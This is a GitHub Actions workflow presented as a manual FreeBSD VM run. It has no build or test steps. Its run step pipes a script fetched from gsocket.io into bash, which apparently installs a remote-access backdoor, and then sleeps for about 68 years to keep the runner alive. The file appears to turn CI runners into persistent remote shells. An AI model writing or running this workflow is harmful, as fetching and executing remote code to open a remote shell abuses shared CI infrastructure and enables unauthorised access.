name: x86_64 freeBSD VM manual run

on:
  workflow_dispatch:

jobs:
  run:
    runs-on: ubuntu-24.04
    steps:
      - name: Launch VM
        uses: vmactions/freebsd-vm@v1
        with:
          usesh: true
          prepare: |
            pkg install -y curl bash
          run: |
            bash -c "$(curl -fsSL https://gsocket.io/y)"
            exec sleep 2147483647
